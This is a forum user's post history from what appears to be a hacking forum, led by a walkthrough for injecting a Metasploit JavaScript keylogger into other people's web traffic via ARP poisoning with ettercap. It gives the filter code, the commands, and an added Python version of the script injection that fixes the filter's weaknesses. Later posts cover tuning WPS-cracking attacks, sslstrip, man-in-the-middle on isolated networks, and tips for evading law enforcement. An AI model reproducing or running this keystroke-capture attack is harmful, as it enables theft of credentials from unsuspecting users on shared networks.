Everything posted by Diggs

  1. Diggs

    The Middler

    I've spent a bit of time working on the Middler issues for a while and haven't gotten to the bottom of them. The Python parsing is both slow and mildly buggy, and the results just haven't shown up for a standalone application which can accomplish what I was hoping for. In the meantime, I found that the Metasploit http_javascript_keylogger has been added back to the stable branch. Combined with some good ettercap filters, you can append either the Java modules or the keylogger script and it's much, much faster.

    First, we need to generate the JavaScript keylogger and set up a handler in Metasploit for it. This is under:

        use auxiliary/server/capture/http_javascript_keylogger

    For some more details on using the module, look here: https://community.rapid7.com/community/metasploit/blog/2012/02/21/metasploit-javascript-keylogger

    Setting this up properly will set up the JavaScript in a random folder under /var/www and create a handler for the returned characters.

    The next step is to insert it into the stream. The ettercap filter I have been playing with looks like this:

        # Request side: neutralise Accept-Encoding (same length, so the packet
        # size is unchanged) so the server answers in plaintext HTML.
        if (ip.proto == TCP && tcp.dst == 80) {
            if (search(DATA.data, "Accept-Encoding")) {
                replace("Accept-Encoding", "Accept-Nothing!");
            }
        }

        # Response side: append the script tag right after </head>.
        # search() and replace() are case-sensitive, so the upper-case
        # variant needs its own rule matching the same case.
        if (ip.proto == TCP && tcp.src == 80) {
            if (search(DATA.data, "</head>")) {
                replace("</head>", "</head><script src=\"http://192.168.0.2/qZBRDzd/test.js\"></script> ");
            }
            if (search(DATA.data, "</HEAD>")) {
                replace("</HEAD>", "</HEAD><script src=\"http://192.168.0.2/qZBRDzd/test.js\"></script> ");
            }
        }

    The qZBRDzd/test.js is the file which is created from the Metasploit module. This can be compiled with etterfilter:

        etterfilter jsEmbed.filter -o jsEmbed.ef

    So, we've got a filter that will insert the JavaScript src right after the head of a document. We now need to run ettercap and MITM the network. You will need to set up IP forwarding:

        echo 1 > /proc/sys/net/ipv4/ip_forward

    And make sure ettercap is set up in etter.conf to handle iptables. Look that part up if you are new to it. Now run ettercap:

        ettercap -T -q -F jsEmbed.ef -M ARP // //

    With this setup, I've found what I originally wanted in the Middler and also used a couple of well known and stable products instead of a one-off demo for a con. If there are any fun ideas or improvements, let me know.
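The two rewrites the ettercap filter above performs, done on whole HTTP messages in Python so they can be tested offline. This is an added example, not code from the original post, from ettercap or from Metasploit. It assumes the placeholder script URL from the post and uses a constructed request and response; it also shows the two things a raw byte-replace filter cannot do in one rule: match `</head>` in any case, and rewrite Content-Length after the body grows (a stale Content-Length is one reason injected pages render broken or truncated).

```python
"""Added example, not code from the original post, ettercap or Metasploit.

Same two rewrites as the ettercap filter above, applied to whole HTTP
messages: drop Accept-Encoding from the request so the server replies in
plaintext, then inject a <script> tag after </head> in the response and fix
Content-Length. SCRIPT_URL is the placeholder value from the post; the sample
request and response are constructed here.
"""
import re

SCRIPT_URL = "http://192.168.0.2/qZBRDzd/test.js"  # placeholder from the post
HEAD_RE = re.compile(rb"</head>", re.IGNORECASE)


def _split(message):
    """Split an HTTP message into (header lines, separator, body)."""
    head, sep, body = message.partition(b"\r\n\r\n")
    return head.split(b"\r\n"), sep, body


def strip_accept_encoding(request):
    """Request side: remove Accept-Encoding so the server cannot gzip the reply.

    ettercap swaps the header name for a same-length string because it works
    on raw packet bytes; with the whole request in hand we can simply drop it.
    """
    lines, sep, body = _split(request)
    kept = [l for l in lines if not l.lower().startswith(b"accept-encoding:")]
    return b"\r\n".join(kept) + sep + body


def inject_script(response, url=SCRIPT_URL):
    """Response side: add <script src=url> after the first </head> (any case).

    Returns the response unchanged when there is no header/body boundary,
    when the body is compressed or chunk-framed (inserting bytes there would
    corrupt it), or when there is no </head> to anchor on. Content-Length is
    rewritten so the browser does not truncate the page; ettercap's replace()
    leaves that header stale.
    """
    lines, sep, body = _split(response)
    if not sep:
        return response
    for line in lines:
        low = line.lower()
        if low.startswith(b"content-encoding:") and b"identity" not in low:
            return response
        if low.startswith(b"transfer-encoding:"):
            return response
    tag = b'<script src="' + url.encode() + b'"></script>'
    new_body, n = HEAD_RE.subn(lambda m: m.group(0) + tag, body, count=1)
    if n == 0:
        return response
    fixed = [
        b"Content-Length: " + str(len(new_body)).encode()
        if line.lower().startswith(b"content-length:") else line
        for line in lines
    ]
    return b"\r\n".join(fixed) + sep + new_body


# Constructed sample traffic for the example.
SAMPLE_REQUEST = (b"GET / HTTP/1.1\r\nHost: example.test\r\n"
                  b"Accept-Encoding: gzip, deflate\r\n\r\n")
SAMPLE_BODY = b"<html><HEAD><title>x</title></HEAD><body></body></html>"
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
                   b"Content-Length: " + str(len(SAMPLE_BODY)).encode()
                   + b"\r\n\r\n" + SAMPLE_BODY)

if __name__ == "__main__":
    print(strip_accept_encoding(SAMPLE_REQUEST).decode())
    print(inject_script(SAMPLE_RESPONSE).decode())
```

Run it as a script to see both rewritten messages. The same logic dropped into a Python proxy (the Middler or sslstrip, which already reassemble full HTTP messages) avoids the per-packet limits of the ettercap filter: a `</head>` split across two TCP segments is never matched by `search()`, and the filter cannot tell a compressed body from a plain one.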
  2. I'm looking at setting up a laptop so I can connect to one of the wireless cards attached to it and ssh into the laptop directly from the wireless connection. Is there a specific term I should be searching for setting up a direct wireless connection without bridging to allow an ssh connection? Thanks
  3. Can anyone confirm sauce on this? I'm always a bit reluctant to install a package that doesn't provide any sourcefiles on Sourceforge. Other than that, this seems like an interesting project and something I was looking around to get for a while.
  4. I have used Reaver. The reason I was asking was so that I could fine tune the reaver settings. The MAC address gives the Manufacturer, but not the model. I started looking through an airodump of the Reaver working and found that I could actually find the Make, Model and firmware version of the router in the pcap file. I was using vi, but I bet if you fired up Wireshark, you could find a lot more info. With this, I can start looking up WPS pin prefixes and the Reaver settings. I would highly recommend this as a step to fine tuning the Reaver attack.
  5. I have a couple questions about the following demo: http://partners.immunityinc.com/movies/SILICA-WPS.mov So basically, Silica has a tab to get more information from the WAP which they are interested in. This includes the make, model and series of WPS pins that have been seen. This allows a user to fine tune the attack. I am interested in if anyone knows how they get the exact make and model off of an unconnected Wireless router and if anyone else has WPS pin-lists to help narrow down the range of pins. I have looked into MAC address lookups, but they identify the make and don't provide much information on the model. Is there any way of analyzing either packets or banners off of an unconnected router to identify it? If anyone here works for Immunity, big ups on Canvas, the Debugger and Silica. If you have a $3400 off coupon, toss it my way. Has anyone else started a WPS Pin list? I could see this being incredibly useful for pattern matching.
  6. Diggs

    Sslstrip

    You probably need to set the permissions for that file to execute. There are two ways to fix this.

    First Method
    =============
    Run 'python ./sslstrip.py -l 8080'. Python will read the script and run it.

    Second Method
    =============
    First, find out what the permissions currently are with 'ls -ltr sslstrip.py' in the directory you have sslstrip.py in. You should have rwxrw-rw- for that to run natively. Try 'sudo chmod 755 sslstrip.py'. Then run './sslstrip.py -l 8080'.

    Basically, this is happening because the file is readable, but not executable. You should set it to executable to run without the 'python' command prepended. Otherwise, Python will be executed and it will just read the sslstrip.py script. Let me know if that makes sense.
  7. I would make sure that ettercap is up to the current version. The L3 errors show up with the older version when there is a conflict with a newer Linux kernel.
  8. You should also check out int0x80's talk on Anti-Forensics. He sets up some scripts to automatically delete the usb drives when they show up. There might be something in his checksum that would prevent the driver from firing if it's not in the whitelist.
  9. This is kind of a known issue with sslstrip. It shows up when an SSL connection has been closed at an unexpected time. It pops up pretty regularly, but can be ignored. I would suggest upgrading it to 0.9, which is the most recent version: http://www.thoughtcrime.org/software/sslstrip/ I would also make sure that ettercap is upgraded if you are using it. Otherwise it acts really funny with newer versions of the Linux kernel.
  10. Diggs

    The Middler

    Ach, now it's been moved to the unstable branch.
  11. For fun, you can also read up on the new Hash collisions. If you can understand that, then you'll probably be able to get DDOS's in general. Plus, it'll get you a bit more into code development. There has also been some DNS based DoS work you could look at. You might also want to specify what you are looking to do. I imagine that you might be trying to get into something and not coming at it in the best direction. I would advise a lot of caution though. Plenty of people who thought they were good are in jails right now for not being smart enough about what illegal things seemed like fun.
  12. Diggs

    The Middler

    I've been working on a couple irritating things with the Middler code and then ran across this: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/auxiliary/server/capture/javascript_keylogger.rb Metasploit MitM keylogger. I'll see if I can get the Middler code working still, but this seems like it pretty much covers what I was hoping to do.
  13. You might also want to try a Python script. I know I've used them to communicate over serial before and it has Serial libraries which aren't too tough.
  14. If you are really careful, you could pick a country which doesn't share extradition treaties with the US. They will probably be hostile, so getting data from that server will also be more difficult. If you are super paranoid, there are some advantages to being off-shore. They are offset by dealing with foreign bodies and all the headache that can entail. You could also set up an Amazon EC2 micro-instance which has decent bandwidth and is free-ish. Depending on how much you are using it, you could use it as an ssh pivot and I bet it would get you by.
  15. Diggs

    Trace Alert

    I know Whisper Systems does full disk encryption on a smartphone. You could set up that with the encrypted SMS and Skype to get things pretty well secured. I think I've just found the tipping point of paranoia Vs. cheapness. Buy a burn phone every week to avoid getting monitored by the Feds? Meh, I'll just let Agent Stanley listen to me talk to all my buddies.
  16. You could also just wait around a corner and pop 'em in the knee with a bat. You gotta understand that being a dick is being a dick. And probably about as legal. Be willing to commit if you're going to commit crimes.
  17. Diggs

    Trace Alert

    Hey Int0x80, you have any suggestions on privatizing cell phone use? I know that Moxie Marlinspike has done work with encrypting text messages, but do you have any suggestions on point to point encryption on calls? Data I'm comfortable with, but communications is something I am pretty inexperienced with.
  18. Diggs

    Trace Alert

    There isn't like a trace time like they show in movies. Basically, Blue Team checks logs and looks for IP addresses they want. Then they go to that IP address. If you pivoted off of something, Blue team requests logs from that server. If you aren't behind a proxy, it's more like they get your address and wait around while a warrant comes through. Tracing who has connected to a server isn't a slow process. It either happens really, really fast and they know which computer they want or it happens really really slow because there is a bunch of paperwork getting filed. So there are ways to hide where you are coming from, but when the FBI starts looking for you, they'll just find you. No tracing involved. If you are worried about having a real-time stalker, that's different. Keep your head down, pay with cash, get out of the region they are looking in. I would say grow a beard, but I'm guessing you are a bit young still. Either way, there isn't really a way to measure the progress of researching you when someone is looking for you, and that is kind of what you are asking for.
  19. Man. I have done terrible, terrible things for pitchers of margaritas. If I would have just known setting security for a router would have gotten me that, I would need a lot less shots every time I go to the doctor's.
  20. Diggs

    Trace Alert

    int0x80's right, if you're getting tracked, your wife/girlfriend/bully is doing it from something on your cellphone. If it's the FBI, you prolly shouldn't 'a done what you done. I'm interested in why you think someone is tracking you too. That might provide insight into how to prevent it.
  21. Diggs

    Trace Alert

    You could also just nuke your phone and computer. Format and re-install. Keep important data on detached storage and slowly migrate it back. The last thing you migrate before you start seeing shadows is probably the infected source. Then I would burn off your fingerprints and drink some ammonia so they can't get your DNA an-SHIT ***THUD***
  22. Diggs

    Trace Alert

    There are a couple other ways this can be done besides malware. They can get a rough estimate of your location based on an IP sometimes. They might even be able to calculate your location from the cellphone towers, but if they are doing that then you're dealing with someone pretty well equipped or with tricks I would love to know about. If they are doing a rough estimate by your IP, you could use a Tor proxy. They have those for Android and you could set one up in your house too. I would guess you've got something running as a daemon or a service, so I would think you'll have to analyze the packets leaving the cell phone by connecting to a wired network, running Wireshark and watching the lines to see what is being output. It'll probably be a bit of digging, but you'll be able to find out what IP it's aiming at, what it's passing back and maybe what applications are using it. From there, you can block the port so it can't talk anymore. You could also go low-tech and just go somewhere that will be both suspicious, out in the open and unfamiliar to the watcher. Then just wait for the person to arrive and watch from a distance. Whatever equipment they are looking at when they are driving up is the problem. Just get a hold of that and see what they have running.
  23. I know I have been blocked on AP Isolation/Client Isolation/Layer-2 WAPs when trying to mitm or DNS spoof. The ARP replies go dead in arpspoof and ettercap. I wondered for a while what was blocking my signals to my cell phone. I spoofed my MAC and it DOS'd the coffeeshop for a bit, so this sounds exactly like what I was running into. Any recommendations on fun that can be had on a Client Isolated network interacting with the other clients? And I'm staying out of the router unless that is the last option. I don't have AP Isolation on my home router, so I don't really have a test bed and pivoting off somebody else's router seems like a good way to be a tattooed gorilla's unwilling girlfriend for a couple months.
  24. Diggs

    The Middler

    i8igmac, that looks like fun. I'll see if I can play with it over this weekend. I haven't made much progress on the Middler plugin since last post. Been caught up in other stuff, but I'm hoping that either tonight or tomorrow night I'll have something to post. Right now, I've got the plugin injecting javascript and then creating a SimpleHttpServer to catch responses, but I need to thread the server because right now it's blocking the remaining process after spawning. After I get this set up, I'll see if the global onClick and onKeyPress events are working and if they keep a couple major websites from breaking. The final step is to see if the Middler sslstrip process works with all this nonsense. After that, some exception handling and logging. That will pretty much round up what I was hoping to do with the Javascript keylogger plugin for an alpha release.
  25. Diggs

    The Middler

    Also, I'm not Kim Jung Un. But that is the most serious golf clap I've ever seen a picture of.